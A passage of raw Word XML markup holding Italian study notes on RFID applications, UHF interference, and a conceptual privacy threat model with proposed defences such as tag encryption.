          <w:rStyle w:val="mw-headline"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>Monetica</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D232F1" w:rsidRDefault="00D232F1" w:rsidP="00D232F1">
      <w:pPr>
        <w:pStyle w:val="Titolo3"/>
        <w:pBdr>
          <w:bottom w:val="dotted" w:sz="4" w:space="2" w:color="DDDDDD"/>
        </w:pBdr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="72" w:afterAutospacing="0" w:line="190" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="mw-headline"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>Bigliettazione Elettronica</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D232F1" w:rsidRPr="00D232F1" w:rsidRDefault="00D232F1" w:rsidP="00D232F1">
      <w:pPr>
        <w:pStyle w:val="Titolo3"/>
        <w:pBdr>
          <w:bottom w:val="dotted" w:sz="4" w:space="2" w:color="DDDDDD"/>
        </w:pBdr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="72" w:afterAutospacing="0" w:line="190" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="mw-headline"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>Logistica Magazzini (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-style-span"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Identificare ogni contenitore e ogni scaffale di magazzino)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D232F1" w:rsidRDefault="00D232F1" w:rsidP="00D232F1">
      <w:pPr>
        <w:pStyle w:val="Titolo3"/>
        <w:pBdr>
          <w:bottom w:val="dotted" w:sz="4" w:space="2" w:color="DDDDDD"/>
        </w:pBdr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="72" w:afterAutospacing="0" w:line="190" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rStyle w:val="apple-style-span"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="mw-headline"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>Logistica Trasport</w:t>
      </w:r>
      <w:r w:rsidR="00EB7A7F">
        <w:rPr>
          <w:rStyle w:val="mw-headline"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="mw-headline"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-style-span"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>vengono applicati sia sugli oggetti (scatole,</w:t>
      </w:r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hyperlink r:id="rId18" w:tooltip="Pallet" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Collegamentoipertestuale"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="002BB8"/>
            <w:sz w:val="13"/>
            <w:szCs w:val="13"/>
            <w:u w:val="none"/>
          </w:rPr>
          <w:t>pallet</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-style-span"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>, ecc.) da trasportare, sia sui mezzi di trasporto (</w:t>
      </w:r>
      <w:hyperlink r:id="rId19" w:tooltip="Carro (ferrovia)" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Collegamentoipertestuale"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="002BB8"/>
            <w:sz w:val="13"/>
            <w:szCs w:val="13"/>
            <w:u w:val="none"/>
          </w:rPr>
          <w:t>vagoni</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-style-span"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId20" w:tooltip="Autovettura" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Collegamentoipertestuale"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="002BB8"/>
            <w:sz w:val="13"/>
            <w:szCs w:val="13"/>
            <w:u w:val="none"/>
          </w:rPr>
          <w:t>automobili</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-style-span"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>, ecc.). )</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D232F1" w:rsidRDefault="00D232F1" w:rsidP="00D232F1">
      <w:pPr>
        <w:pStyle w:val="Titolo3"/>
        <w:pBdr>
          <w:bottom w:val="dotted" w:sz="4" w:space="2" w:color="DDDDDD"/>
        </w:pBdr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="72" w:afterAutospacing="0" w:line="190" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="mw-headline"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>Controllo presenze ed accessi</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D232F1" w:rsidRDefault="00D232F1" w:rsidP="00D232F1">
      <w:pPr>
        <w:pStyle w:val="Titolo3"/>
        <w:pBdr>
          <w:bottom w:val="dotted" w:sz="4" w:space="2" w:color="DDDDDD"/>
        </w:pBdr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="72" w:afterAutospacing="0" w:line="190" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="mw-headline"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>Identificazione degli animali</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D232F1" w:rsidRDefault="00D232F1" w:rsidP="00D232F1">
      <w:pPr>
        <w:pStyle w:val="Titolo3"/>
        <w:pBdr>
          <w:bottom w:val="dotted" w:sz="4" w:space="2" w:color="DDDDDD"/>
        </w:pBdr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="72" w:afterAutospacing="0" w:line="190" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="mw-headline"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>Biblioteche - rilevazione patrimonio librario e movimento libri</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D232F1" w:rsidRDefault="00D232F1" w:rsidP="00D232F1">
      <w:pPr>
        <w:pStyle w:val="Titolo3"/>
        <w:pBdr>
          <w:bottom w:val="dotted" w:sz="4" w:space="2" w:color="DDDDDD"/>
        </w:pBdr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="72" w:afterAutospacing="0" w:line="190" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="mw-headline"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>Antitaccheggio</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D232F1" w:rsidRPr="00D232F1" w:rsidRDefault="00D232F1" w:rsidP="00D232F1">
      <w:pPr>
        <w:pStyle w:val="Titolo3"/>
        <w:pBdr>
          <w:bottom w:val="dotted" w:sz="4" w:space="2" w:color="DDDDDD"/>
        </w:pBdr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="72" w:afterAutospacing="0" w:line="190" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D232F1" w:rsidRPr="00A4657F" w:rsidRDefault="00D232F1" w:rsidP="00496616">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002D60FC" w:rsidRPr="002D60FC" w:rsidRDefault="002D60FC" w:rsidP="002D60FC">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="apple-style-span"/>
        </w:rPr>
      </w:pPr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>Sono solo esempi comuni, in realtà ci sono decine di alternative</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D60FC" w:rsidRPr="002D60FC" w:rsidRDefault="002D60FC" w:rsidP="002D60FC">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="apple-style-span"/>
        </w:rPr>
      </w:pPr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> I dispositivi che lavorano in UHF sono più a rischio per disturbi ed</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D60FC" w:rsidRPr="002D60FC" w:rsidRDefault="002D60FC" w:rsidP="002D60FC">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="apple-style-span"/>
        </w:rPr>
      </w:pPr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>interferenze dovute a reti wireless, apparati radio, macchine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D60FC" w:rsidRPr="002D60FC" w:rsidRDefault="002D60FC" w:rsidP="002D60FC">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="apple-style-span"/>
        </w:rPr>
      </w:pPr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 xml:space="preserve">elettriche, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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>…</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D60FC" w:rsidRPr="002D60FC" w:rsidRDefault="002D60FC" w:rsidP="002D60FC">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="apple-style-span"/>
        </w:rPr>
      </w:pPr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> L’aumento in frequenza è spesso affiancato all’utilizzo di tecnologie</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D60FC" w:rsidRPr="002D60FC" w:rsidRDefault="002D60FC" w:rsidP="002D60FC">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="apple-style-span"/>
        </w:rPr>
      </w:pPr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 xml:space="preserve">attive che aumentano il </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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>range</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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 xml:space="preserve"> ma limitano la vita del componente</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00496616" w:rsidRDefault="002D60FC" w:rsidP="002D60FC">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="apple-style-span"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002D60FC">
        <w:rPr>
          <w:rStyle w:val="apple-style-span"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>alla vita della batteria</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004161E4" w:rsidRPr="00A4657F" w:rsidRDefault="00F00982">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A4657F">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>Il problema della sicurezza ( dati personali – attacchi al server)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FA5D72" w:rsidRPr="00787239" w:rsidRDefault="00787239" w:rsidP="00787239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Le caratteristiche dei sistemi </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Garamond" w:hAnsi="Garamond" w:cs="Garamond"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Rfid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Garamond" w:hAnsi="Garamond" w:cs="Garamond"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> hanno spinto lo sviluppo di tecnologie per un vasto raggio di applicazioni ma, al tempo stesso, esse presentano anche delle vulnerabilità. Infatti, un sistema </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Garamond" w:hAnsi="Garamond" w:cs="Garamond"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>RFId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Garamond" w:hAnsi="Garamond" w:cs="Garamond"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, anche se intrinsecamente fidato, può essere sottoposto a minacce concernenti la sicurezza delle informazioni che tratta. Per questo motivo, molta attenzione è rivolta dalla maggior parte delle organizzazioni alla sicurezza delle informazioni.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00787239" w:rsidRDefault="00787239" w:rsidP="00787239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I livelli di Sicurezza e di Privacy di un sistema </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Garamond" w:hAnsi="Garamond" w:cs="Garamond"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>RFId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Garamond" w:hAnsi="Garamond" w:cs="Garamond"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> sono dipendenti dal rapporto costo/benefici</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00787239" w:rsidRDefault="00787239" w:rsidP="00787239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che il loro trattamento può procurare, cioè risultano strettamente legati alle </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Garamond" w:hAnsi="Garamond" w:cs="Garamond"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="25"/>
          <w:szCs w:val="25"/>
        </w:rPr>
        <w:t xml:space="preserve">necessità </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Garamond" w:hAnsi="Garamond" w:cs="Garamond"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>di impiego</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E27761" w:rsidRDefault="000B2FB4" w:rsidP="000B2FB4">
      <w:pPr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applicative.</w:t>
      </w:r>
      <w:r w:rsidR="00E27761">
        <w:rPr>
          <w:rFonts w:ascii="Garamond" w:hAnsi="Garamond" w:cs="Garamond"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FA5D72" w:rsidRPr="00E27761" w:rsidRDefault="00E27761" w:rsidP="00787239">
      <w:pPr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Si possono suddividere le vulnerabilità i “privacy” e “attacchi ai dati” -&gt; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Garamond" w:hAnsi="Garamond" w:cs="Garamond"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>safety</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Garamond" w:hAnsi="Garamond" w:cs="Garamond"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> e </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Garamond" w:hAnsi="Garamond" w:cs="Garamond"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>sicurity</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Garamond" w:hAnsi="Garamond" w:cs="Garamond"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F00982" w:rsidRPr="00A4657F" w:rsidRDefault="00F00982" w:rsidP="00F00982">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A4657F">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>Threat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A4657F">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> model</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E27761" w:rsidRDefault="00F00982" w:rsidP="00F00982">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A4657F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>(a) Attacchi contro la riservatezza e la privacy</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E27761" w:rsidRDefault="00E27761" w:rsidP="00F00982">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="007D2ACA" w:rsidRDefault="00E27761" w:rsidP="00F00982">
      <w:pPr>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Estremizzando un esempio </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">si può ipotizzare </w:t>
      </w:r>
      <w:r w:rsidR="007D2ACA">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">uno scenario in cui una persona vada in un supermercato a fare spesa, paghi con un </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="007D2ACA">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>rfid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="007D2ACA">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> impiantato nel corpo una serie di prodotti ognuno con un </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="007D2ACA">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>rfid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="007D2ACA">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> identificativo. L’</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="007D2ACA">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>rfid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="007D2ACA">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> che ha nel proprio corpo oltre ad essere strumento per i pagamenti raccoglie anche informazioni sullo stato di salute della persona, oltre a localizzarla ovunque si trovi.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C548D0" w:rsidRDefault="007D2ACA" w:rsidP="00F00982">
      <w:pPr>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>Un possibile attaccante in uno scenario simile potrebbe ottenere molte informazioni di quella persona: potrebbe sapere i suoi gusti sapendo i prodotti che ha comprato, sapere le sue abitudini vedendo</w:t>
      </w:r>
      <w:r w:rsidR="00EB7A7F">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> i suoi spostamenti e sapere il suo </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>stato di salute. Con tutte queste informazioni</w:t>
      </w:r>
      <w:r w:rsidR="00711BD0">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>, un’azienda, per esempio</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> potrebbe proporgli </w:t>
      </w:r>
      <w:r w:rsidR="00711BD0">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>prodotti mirati secondo i suoi gusti e la sua salute</w:t>
      </w:r>
      <w:r w:rsidR="00C548D0">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C548D0" w:rsidRDefault="00C548D0" w:rsidP="00F00982">
      <w:pPr>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>D’altro canto se la persona ha una qualche malattia tramite il chip sarebbe possibile rintracciarla in caso si sentisse male.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E27761" w:rsidRPr="00E27761" w:rsidRDefault="00B3060B" w:rsidP="00B3060B">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6710"/>
        </w:tabs>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>In molti hanno avuto tali dubbi e hanno ipotizzato scenari simili.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B3060B" w:rsidRDefault="00B3060B" w:rsidP="00F00982">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>Possibili difese:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B3060B" w:rsidRPr="00B3060B" w:rsidRDefault="00B3060B" w:rsidP="00B3060B">
      <w:pPr>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B3060B">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Cifratura dei </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B3060B">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>tag</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00B3060B" w:rsidRPr="00B3060B" w:rsidRDefault="00B3060B" w:rsidP="00B3060B">
      <w:pPr>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B3060B">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">- Infattibile sui </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B3060B">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>tag</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B3060B">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> più economici (se non esternamente)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00162D37" w:rsidRDefault="00B3060B" w:rsidP="00B3060B">
      <w:pPr>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B3060B">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>- Tag costosi fattibile, ma in genere con algoritmi deboli</w:t>
      </w:r>
      <w:r w:rsidR="00162D37">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B3060B" w:rsidRPr="00B3060B" w:rsidRDefault="00162D37" w:rsidP="00B3060B">
      <w:pPr>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
